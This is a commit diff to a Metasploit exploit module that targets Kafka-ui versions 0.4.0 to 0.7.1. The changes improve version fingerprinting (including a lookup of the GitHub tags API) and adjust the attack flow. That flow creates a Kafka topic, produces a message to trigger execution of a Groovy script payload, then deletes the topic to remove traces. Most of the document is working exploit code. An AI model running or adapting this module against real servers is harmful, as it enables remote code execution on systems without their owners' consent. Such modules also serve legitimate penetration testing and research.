Second release of module
This commit is contained in:
parent
3db32da70f
commit
d5f30befbb
|
@ -76,17 +76,55 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def vuln_version?
|
||||
@version = ''
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'ctype' => 'application/json',
|
||||
'uri' => normalize_uri(target_uri.path, 'api', 'info')
|
||||
'uri' => normalize_uri(target_uri.path, 'actuator', 'info')
|
||||
})
|
||||
if res && res.code == 200 && res.body.include?('build')
|
||||
if res && res.code == 200 && (res.body.include?('build') || res.body.include?('git'))
|
||||
res_json = res.get_json_document
|
||||
unless res_json.blank?
|
||||
@version = res_json['build']['version'].delete_prefix('v') # remove v from vx.x.x
|
||||
if res.body.include?('build')
|
||||
@version = res_json['build']['version'].delete_prefix('v') # remove v from vx.x.x
|
||||
elsif res.body.include?('git')
|
||||
# determine version by using git commit id by querying api.github.com/repos/provectus/kafka-ui/tags.
|
||||
git_commit_id = res_json['git']['commit']['id']
|
||||
# git commit id 38c4cf7 is for whatever reason not listed when quering api.github.com, so we handle this manually
|
||||
if git_commit_id == '38c4cf7'
|
||||
@version = '0.3.3'
|
||||
else
|
||||
# !!! overwriting datastore options is not neat, but I frankly do not know how to do this nicely.
|
||||
# !!! suggestions are welcome ;-)
|
||||
rhost = datastore['RHOSTS']
|
||||
rport = datastore['RPORT']
|
||||
ssl = datastore['SSL']
|
||||
datastore['RHOSTS'] = 'api.github.com'
|
||||
datastore['RPORT'] = 443
|
||||
datastore['SSL'] = true
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'ctype' => 'application/json',
|
||||
'uri' => normalize_uri(target_uri.path, 'repos', 'provectus', 'kafka-ui', 'tags')
|
||||
})
|
||||
datastore['RHOSTS'] = rhost
|
||||
datastore['RPORT'] = rport
|
||||
datastore['SSL'] = ssl
|
||||
if res && res.code == 200
|
||||
res_json = res.get_json_document
|
||||
unless res_json.blank?
|
||||
# loop thru the list of commits and return the version based a match on the first 7 chars of the sha commit else return nil
|
||||
res_json.each do |tag|
|
||||
if tag['commit']['sha'][0, 7] == git_commit_id
|
||||
@version = tag['name'].delete_prefix('v')
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
return Rex::Version.new(@version) <= Rex::Version.new('0.7.1') && Rex::Version.new(@version) >= Rex::Version.new('0.4.0') if @version.match(/\d\.\d\.\d/)
|
||||
end
|
||||
false
|
||||
|
@ -117,6 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
post_data = {
|
||||
name: topic_name.to_s,
|
||||
partitions: 1,
|
||||
replicationFactor: 1,
|
||||
configs:
|
||||
{
|
||||
'cleanup.policy': 'delete',
|
||||
|
@ -192,24 +231,31 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
print_status("Checking if #{peer} can be exploited.")
|
||||
return CheckCode::Vulnerable("Kafka-ui version: #{@version}") if vuln_version?
|
||||
return CheckCode::Appears("Kafka-ui version: #{@version}") if vuln_version?
|
||||
|
||||
unless @version.blank?
|
||||
if @version.match(/\d\.\d\.\d/)
|
||||
return CheckCode::Safe("Kafka-ui version: #{@version}")
|
||||
else
|
||||
return CheckCode::Detected("Kafka-ui unknown version: #{@version}")
|
||||
end
|
||||
end
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
|
||||
print_status('Searching for active Kafka cluster...')
|
||||
vprint_status('Searching for active Kafka cluster...')
|
||||
@cluster = get_cluster
|
||||
fail_with(Failure::NotFound, 'Could not find or connect to an active Kafka cluster.') if @cluster.nil?
|
||||
print_good("Active Kafka cluster found: #{@cluster}")
|
||||
vprint_good("Active Kafka cluster found: #{@cluster}")
|
||||
|
||||
print_status('Creating a new topic...')
|
||||
vprint_status('Creating a new topic...')
|
||||
@new_topic = create_topic(@cluster)
|
||||
fail_with(Failure::Unknown, 'Could not create a new topic.') if @new_topic.nil?
|
||||
print_good("New topic created: #{@new_topic}")
|
||||
vprint_good("New topic created: #{@new_topic}")
|
||||
|
||||
print_status('Trigger Groovy script payload execution by creating a message...')
|
||||
vprint_status('Trigger Groovy script payload execution by creating a message...')
|
||||
fail_with(Failure::PayloadFailed, 'Could not trigger the Groovy script payload execution.') unless produce_message(@cluster, @new_topic)
|
||||
|
||||
case target['Type']
|
||||
|
@ -222,11 +268,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# cleaning up the mess and remove new created topic
|
||||
print_status('Removing tracks...')
|
||||
vprint_status('Removing tracks...')
|
||||
if delete_topic(@cluster, @new_topic)
|
||||
print_good("Successfully deleted topic #{@new_topic}.")
|
||||
vprint_good("Successfully deleted topic #{@new_topic}.")
|
||||
else
|
||||
print_error("Could not delete topic #{@new_topic}. Manually cleaning required.")
|
||||
vprint_error("Could not delete topic #{@new_topic}. Manually cleaning required.")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue